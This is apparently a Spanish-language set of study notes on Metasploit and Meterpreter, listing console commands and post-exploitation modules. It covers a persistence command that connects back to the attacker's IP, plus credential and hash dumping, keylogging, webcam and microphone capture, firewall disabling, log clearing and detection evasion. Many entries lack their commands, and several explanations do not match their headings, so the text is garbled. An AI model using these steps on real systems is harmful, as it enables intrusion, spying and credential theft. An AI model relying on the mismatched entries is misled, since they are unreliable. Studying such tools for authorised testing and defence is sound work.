
📘METASPLOIT
comandos básicos y formas de uso de Metasploit para que puedas tomar notas:
Iniciar Metasploit:
msfconsoleExplicación: Inicia la consola de Metasploit.
Mostrar módulos disponibles:
show modulesExplicación: Muestra todos los módulos disponibles en Metasploit.
Buscar módulos por nombre o descripción:
search <keyword>Explicación: Busca módulos que coincidan con el término clave en el nombre o descripción.
Seleccionar un módulo para usar:
use <module_name>Explicación: Selecciona un módulo específico para utilizarlo.
Mostrar opciones del módulo:
show optionsExplicación: Muestra las opciones disponibles para el módulo seleccionado.
Configurar opciones del módulo:
set <option_name> <value>Explicación: Configura opciones específicas para el módulo seleccionado.
Mostrar payloads disponibles:
show payloadsExplicación: Muestra todos los payloads disponibles para el módulo seleccionado.
Seleccionar un payload:
set payload <payload_name>Explicación: Selecciona un payload específico para utilizarlo.
Configurar opciones del payload:
set LHOST <your_IP> set LPORT <listening_port>Explicación: Configura opciones específicas para el payload, como la dirección IP del atacante (LHOST) y el puerto de escucha (LPORT).
Ejecutar el exploit:
exploitExplicación: Ejecuta el exploit con la configuración y el payload especificados.
Mostrar sesiones abiertas:
sessionsExplicación: Muestra las sesiones de Metasploit que están abiertas.
Interactuar con una sesión abierta:
sessions -i <session_number>Explicación: Interactúa con una sesión abierta utilizando su número de sesión.
Capturar una shell persistente en el sistema objetivo:
run persistence -U -i 5 -p <listening_port> -r <your_IP>Explicación: Configura una shell persistente para ejecutarse en el sistema objetivo cada 5 minutos y conectarse a la dirección IP del atacante en el puerto especificado.
Algunos comandos adicionales de Metasploit, incluyendo aquellos relacionados con la gestión de la base de datos de Metasploit (MSFDB):
Configurar la base de datos de Metasploit:
Explicación: Muestra el estado actual de la base de datos de Metasploit.
Iniciar la base de datos de Metasploit:
Explicación: Inicia la base de datos de Metasploit si no está en ejecución.
Importar hosts escaneados a la base de datos:
Explicación: Importa hosts escaneados desde un archivo XML a la base de datos de Metasploit.
Mostrar información sobre hosts en la base de datos:
Explicación: Muestra información sobre los hosts almacenados en la base de datos.
Mostrar información detallada sobre un host específico:
Explicación: Muestra información detallada sobre un host específico en la base de datos.
Eliminar un host de la base de datos:
Explicación: Escanea un host específico utilizando Nmap con detección de vulnerabilidades y almacena los resultados en la base de datos.
Ejecutar una auditoría de seguridad en hosts almacenados en la base de datos:
Explicación: Ejecuta una auditoría de seguridad automática en los hosts almacenados en la base de datos.
Mostrar exploits disponibles en la base de datos:
Explicación: Muestra información sobre los servicios detectados y almacenados en la base de datos.
Cargar un exploit desde la base de datos:
Explicación: Carga un exploit desde la base de datos para su uso.
Actualizar información sobre exploits desde Internet:
Explicación: Actualiza la información sobre exploits desde Internet y la almacena en la base de datos.
Buscar exploits en la base de datos:
Explicación: Busca exploits en la base de datos según la plataforma (en este caso, Windows).
Mostrar información sobre un exploit específico:
Explicación: Muestra información detallada sobre un exploit específico.
comandos especiales de Meterpreter y sus explicaciones:
Ejecutar un comando en la máquina objetivo:
Explicación: Ejecuta el comando especificado (
notepad.exeen este caso) en la máquina objetivo.
Listar procesos en la máquina objetivo:
Explicación: Muestra una lista de procesos en ejecución en la máquina objetivo.
Cambiar de proceso en Meterpreter:
Explicación: Cambia a otro proceso en la máquina objetivo utilizando su ID de proceso.
Capturar la webcam de la máquina objetivo:
Explicación: Captura una imagen de la webcam de la máquina objetivo.
Grabar el audio del micrófono de la máquina objetivo:
Explicación: Graba audio desde el micrófono de la máquina objetivo durante 10 segundos.
Capturar la pantalla de la máquina objetivo:
Explicación: Captura la pantalla de la máquina objetivo y muestra la imagen.
Obtener información del sistema objetivo:
Explicación: Muestra información detallada sobre el sistema operativo y la configuración de la máquina objetivo.
Enumerar sesiones Meterpreter activas:
Explicación: Muestra una lista de sesiones Meterpreter activas.
Interactuar con una sesión Meterpreter específica:
Explicación: Permite interactuar con una sesión Meterpreter específica utilizando su ID de sesión.
Cargar un script en Meterpreter:
Explicación: Carga un script en Meterpreter para realizar acciones específicas.
Habilitar el servidor VNC en la máquina objetivo:
Explicación: Inicia un servidor VNC en la máquina objetivo, permitiendo la conexión a su escritorio.
Exfiltrar archivos de la máquina objetivo a la máquina del atacante:
Explicación: Descarga un archivo desde la máquina objetivo a la máquina del atacante.
Cargar un módulo adicional en Meterpreter:
Explicación: Carga un módulo adicional en Meterpreter para ampliar sus capacidades.
Ejecutar comandos del sistema operativo en Meterpreter:
Explicación: Abre una shell interactiva en el contexto del sistema operativo de la máquina objetivo.
Cerrar una sesión Meterpreter:
Explicación: Cierra una sesión Meterpreter específica utilizando su ID de sesión.
comandos especiales de Meterpreter, incluyendo aquellos relacionados con la escalada de privilegios y otras funciones avanzadas:
Capturar pulsaciones de teclas en la máquina objetivo:
Explicación: Inicia la captura de pulsaciones de teclas en la máquina objetivo.
Detener la captura de pulsaciones de teclas:
Explicación: Detiene la captura de pulsaciones de teclas y muestra el resultado.
Enumerar usuarios en la máquina objetivo:
Explicación: Enumera los usuarios presentes en la máquina objetivo.
Enumerar redes y compartir recursos en la máquina objetivo:
Explicación: Muestra información sobre redes y recursos compartidos en la máquina objetivo.
Ejecutar un script en PowerShell en la máquina objetivo:
Explicación: Ejecuta un script de PowerShell en la máquina objetivo.
Capturar las credenciales almacenadas en la máquina objetivo:
Explicación: Utiliza Mimikatz para capturar las credenciales almacenadas en la máquina objetivo.
Cargar un keylogger en la máquina objetivo:
Explicación: Carga un keylogger en la máquina objetivo para registrar pulsaciones de teclas.
Escalar privilegios en la máquina objetivo (Windows)((PROBAR)):
Explicación: Intenta escalar privilegios en la máquina objetivo a SYSTEM.
Agregar una excepción al firewall de la máquina objetivo:
Explicación: Agrega una excepción al firewall de la máquina objetivo para permitir conexiones entrantes.
Capturar tráfico de red en la máquina objetivo:
Explicación: Captura el tráfico de red en la máquina objetivo y guarda los resultados en un archivo pcap.
Ejecutar un comando arbitrario en la máquina objetivo:
Explicación: Ejecuta un comando arbitrario en la máquina objetivo utilizando cmd.exe.
Habilitar el servidor FTP en la máquina objetivo:
Explicación: Habilita un servidor FTP en la máquina objetivo para transferencia de archivos.
Modificar la fecha de creación de un archivo en la máquina objetivo:
Explicación: Modifica la fecha de creación de un archivo en la máquina objetivo.
Inyectar un payload en un proceso en ejecución:
Explicación: Inyecta un payload en un proceso en ejecución en la máquina objetivo.
Mostrar información sobre la configuración del sistema objetivo:
Explicación: Muestra información detallada sobre la configuración del sistema objetivo.
Comandos principales:
background: pone en segundo plano la sesión actualexit: Terminar la sesión de Meterpreterguid: Obtenga el GUID (Identificador único global) de la sesiónhelp: muestra el menú de ayudainfo: muestra información sobre un módulo de publicación.irb: abre un shell Ruby interactivo en la sesión actual.load: Carga una o más extensiones de Meterpretermigrate: Le permite migrar Meterpreter a otro procesorun: Ejecuta un script de Meterpreter o un módulo de publicación.sessions: cambia rápidamente a otra sesión
Comandos del sistema de archivos:
cd: Cambiará de directoriols: enumerará los archivos en el directorio actual (el directorio también funcionará)pwd: Imprime el directorio de trabajo actualedit: le permitirá editar un archivocat: Mostrará el contenido de un archivo en la pantalla.rm: Eliminará el archivo especificadosearch: Buscará archivosupload: Subirá un archivo o directoriodownload: Descargará un archivo o directorio
Comandos de red
arp: Muestra la caché ARP (Protocolo de resolución de direcciones) del hostifconfig: Muestra las interfaces de red disponibles en el sistema de destino.netstat: Muestra las conexiones de red.portfwd: reenvía un puerto local a un servicio remotoroute: Le permite ver y modificar la tabla de enrutamiento.
Comandos del sistema:
clearev: borra los registros de eventosexecute: Ejecuta un comandogetpid: Muestra el identificador del proceso actual.getuid: Muestra al usuario que Meterpreter se está ejecutando comokill: Termina un procesopkill: Termina procesos por nombreps: enumera los procesos en ejecuciónreboot: Reinicia la computadora remotashell: cae en un shell de comandos del sistemashutdown: Apaga la computadora remotasysinfo: Obtiene información sobre el sistema remoto, como el sistema operativo.
Otros comandos (estos se enumerarán en diferentes categorías de menú en el menú de ayuda):
idletime: Devuelve el número de segundos que el usuario remoto ha estado inactivokeyscan_dump: Vuelca el búfer de pulsaciones de teclas.keyscan_start: Comienza a capturar pulsaciones de teclaskeyscan_stop: Deja de capturar pulsaciones de teclasscreenshare: Le permite ver el escritorio del usuario remoto en tiempo realscreenshot: toma una captura de pantalla del escritorio interactivorecord_mic: Graba audio desde el micrófono predeterminado durante X segundoswebcam_chat: inicia un chat de vídeowebcam_list: enumera las cámaras webwebcam_snap: toma una instantánea de la cámara web especificadawebcam_stream: reproduce una transmisión de video desde la cámara web especificadagetsystem: Intenta elevar su privilegio al de sistema localhashdump: Vuelca el contenido de la base de datos SAM
Módulos de Post-Explotación:
Módulo:
post/multi/manage/firewall_bypassRuta:
use post/multi/manage/firewall_bypassDescripción: Agrega una excepción al firewall de la máquina objetivo para permitir conexiones entrantes.
Uso:
Módulo:
post/windows/gather/checkvmRuta:
use post/windows/gather/checkvmDescripción: Verifica si la máquina objetivo se está ejecutando en una máquina virtual.
Uso:
Módulo:
post/windows/gather/enum_domain_usersRuta:
use post/windows/gather/enum_domain_usersDescripción: Enumera los usuarios del dominio en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_sharesRuta:
use post/windows/gather/enum_sharesDescripción: Enumera los recursos compartidos en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_logged_on_usersRuta:
use post/windows/gather/enum_logged_on_usersDescripción: Enumera los usuarios que han iniciado sesión en la máquina objetivo.
Uso:
Módulo:
post/windows/manage/persistence_exeRuta:
use post/windows/manage/persistence_exeDescripción: Establece persistencia ejecutando un payload cada vez que se inicia la máquina.
Uso:
Módulo:
post/windows/manage/download_execRuta:
use post/windows/manage/download_execDescripción: Descarga y ejecuta un archivo en la máquina objetivo.
Uso:
Módulo:
post/windows/manage/migrateRuta:
use post/windows/manage/migrateDescripción: Cambia a otro proceso en la máquina objetivo para evadir detección.
Uso:
Estos módulos de post-explotación son esenciales para realizar tareas específicas después de comprometer una máquina y proporcionan funcionalidades avanzadas en Metasploit.
más módulos de post-explotación en Metasploit, cada uno con su descripción y uso:
Módulo:
post/windows/gather/enum_patchesRuta:
use post/windows/gather/enum_patchesDescripción: Enumera los parches instalados en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_applicationsRuta:
use post/windows/gather/enum_applicationsDescripción: Enumera las aplicaciones instaladas en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_wifiRuta:
use post/windows/gather/enum_wifiDescripción: Enumera los perfiles de Wi-Fi almacenados en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_vaultRuta:
use post/windows/gather/enum_vaultDescripción: Enumera los elementos almacenados en el "Credential Vault" en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_servicesRuta:
use post/windows/gather/enum_servicesDescripción: Enumera los servicios instalados en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_logged_sessionsRuta:
use post/windows/gather/enum_logged_sessionsDescripción: Enumera las sesiones de usuario iniciadas en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_firefoxRuta:
use post/windows/gather/enum_firefoxDescripción: Enumera las credenciales almacenadas en Firefox en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_chromeRuta:
use post/windows/gather/enum_chromeDescripción: Enumera las credenciales almacenadas en Chrome en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_ieRuta:
use post/windows/gather/enum_ieDescripción: Enumera las credenciales almacenadas en Internet Explorer en la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_snmpRuta:
use post/windows/gather/enum_snmpDescripción: Enumera información SNMP de la máquina objetivo.
Uso:
Módulo:
post/windows/gather/enum_printerRuta:
use post/windows/gather/enum_printerDescripción: Enumera las impresoras instaladas en la máquina objetivo.
Uso:
Módulo:
post/windows/manage/killfwRuta:
use post/windows/manage/killfwDescripción: Detiene y desactiva el firewall de Windows en la máquina objetivo.
Uso:
Estos módulos ofrecen una amplia variedad de funcionalidades para recopilar información y realizar acciones específicas en la máquina objetivo después de una explotación exitosa.
más módulos de post-explotación específicos para sistemas Linux en Metasploit:
Módulo:
post/linux/gather/enum_configsRuta:
use post/linux/gather/enum_configsDescripción: Enumera configuraciones críticas de la máquina Linux objetivo.
Uso:
Módulo:
post/linux/gather/enum_sessionsRuta:
use post/linux/gather/enum_sessionsDescripción: Enumera sesiones de usuarios abiertas en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_servicesRuta:
use post/linux/gather/enum_servicesDescripción: Enumera los servicios en ejecución en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_applicationsRuta:
use post/linux/gather/enum_applicationsDescripción: Enumera las aplicaciones instaladas en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_loginsRuta:
use post/linux/gather/enum_loginsDescripción: Enumera información sobre inicios de sesión en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_networkRuta:
use post/linux/gather/enum_networkDescripción: Enumera información de red en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_usersRuta:
use post/linux/gather/enum_usersDescripción: Enumera los usuarios en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_filesRuta:
use post/linux/gather/enum_filesDescripción: Enumera archivos y directorios críticos en la máquina Linux.
Uso:
Módulo:
post/linux/gather/enum_configsRuta:
use post/linux/gather/enum_configsDescripción: Enumera configuraciones específicas de la máquina Linux.
Uso:
Módulo:
post/linux/manage/clear_logsRuta:
use post/linux/manage/clear_logsDescripción: Borra los registros de logs en la máquina Linux para ocultar actividades.
Uso:
Estos módulos te permitirán realizar diversas acciones y recopilar información en sistemas Linux después de una explotación exitosa.
módulos de Metasploit para la recolección de hashes y credenciales de usuarios en sistemas Windows y Linux:
Para Windows:
Módulo:
post/windows/gather/smart_hashdumpRuta:
use post/windows/gather/smart_hashdumpDescripción: Recopila hashes de contraseñas desde la memoria en sistemas Windows.
Uso:
Módulo:
post/windows/gather/credentials/gppRuta:
use post/windows/gather/credentials/gppDescripción: Enumera credenciales almacenadas en Preferencias de Política de Grupo (GPP) en sistemas Windows.
Uso:
Módulo:
post/windows/gather/credentials/mimikatzRuta:
use post/windows/gather/credentials/mimikatzDescripción: Utiliza Mimikatz para extraer credenciales almacenadas en sistemas Windows.
Uso:
Módulo:
post/windows/gather/credentials/credential_collectorRuta:
use post/windows/gather/credentials/credential_collectorDescripción: Recopila credenciales almacenadas en sistemas Windows.
Uso:
Para Linux:
Módulo:
post/linux/gather/enum_sshRuta:
use post/linux/gather/enum_sshDescripción: Enumera claves privadas y configuraciones de SSH en sistemas Linux.
Uso:
Módulo:
post/linux/gather/enum_keysRuta:
use post/linux/gather/enum_keysDescripción: Enumera claves privadas y archivos de configuración en sistemas Linux.
Uso:
Módulo:
post/linux/gather/enum_passwordsRuta:
use post/linux/gather/enum_passwordsDescripción: Enumera contraseñas y credenciales almacenadas en sistemas Linux.
Uso:
Módulo:
post/linux/gather/enum_gnomeRuta:
use post/linux/gather/enum_gnomeDescripción: Enumera credenciales almacenadas en entornos GNOME en sistemas Linux.
Uso:
Módulo:
post/linux/gather/enum_kde_walletRuta:
use post/linux/gather/enum_kde_walletDescripción: Enumera credenciales almacenadas en el "KDE Wallet" en sistemas Linux.
Uso:
Estos módulos te permitirán recolectar hashes y credenciales de usuarios en sistemas Windows y Linux después de una explotación exitosa.
variedad de módulos de Metasploit para sistemas Windows y Linux, incluyendo módulos auxiliares, de escaneo, y más:
Auxiliares:
Para Windows:
Módulo:
auxiliary/admin/http/iis_put
Ruta:
use auxiliary/admin/http/iis_putDescripción: Intenta realizar un ataque PUT en servidores IIS para cargar un archivo.
Uso:
Módulo:
auxiliary/admin/smb/smb_enumshares
Ruta:
use auxiliary/admin/smb/smb_enumsharesDescripción: Enumera los recursos compartidos en un servidor SMB en sistemas Windows.
Uso:
Módulo:
auxiliary/scanner/http/jboss_vulnscan
Ruta:
use auxiliary/scanner/http/jboss_vulnscanDescripción: Escanea servidores JBoss para vulnerabilidades conocidas.
Uso:
Para Linux:
Módulo:
auxiliary/scanner/ssh/ssh_enumusersRuta:
use auxiliary/scanner/ssh/ssh_enumusersDescripción: Enumera usuarios a través de SSH en sistemas Linux.
Uso:
Módulo:
auxiliary/scanner/mysql/mysql_versionRuta:
use auxiliary/scanner/mysql/mysql_versionDescripción: Escanea servidores MySQL para obtener la versión.
Uso:
Módulo:
auxiliary/scanner/ftp/ftp_versionRuta:
use auxiliary/scanner/ftp/ftp_versionDescripción: Escanea servidores FTP para obtener la versión.
Uso:
De Escaneo:
Para Windows:
Módulo:
scanner/smb/smb_versionRuta:
use scanner/smb/smb_versionDescripción: Escanea servidores SMB para obtener la versión.
Uso:
Módulo:
scanner/winrm/winrm_versionRuta:
use scanner/winrm/winrm_versionDescripción: Escanea servidores WinRM para obtener la versión.
Uso:
Módulo:
scanner/http/ntlm_infoRuta:
use scanner/http/ntlm_infoDescripción: Escanea servidores HTTP para obtener información sobre la autenticación NTLM.
Uso:
Para Linux:
Módulo:
scanner/ssh/ssh_loginRuta:
use scanner/ssh/ssh_loginDescripción: Escanea servidores SSH para realizar un intento de inicio de sesión.
Uso:
Módulo:
scanner/http/wordpress_login_enumRuta:
use scanner/http/wordpress_login_enumDescripción: Escanea sitios WordPress para enumerar usuarios.
Uso:
Módulo:
scanner/http/joomla_versionRuta:
use scanner/http/joomla_versionDescripción: Escanea sitios Joomla para obtener la versión.
Uso:
Estos módulos ofrecen una variedad de funcionalidades, desde explorar versiones de servicios hasta realizar escaneos de vulnerabilidades y enumerar información sobre sistemas.
Last updated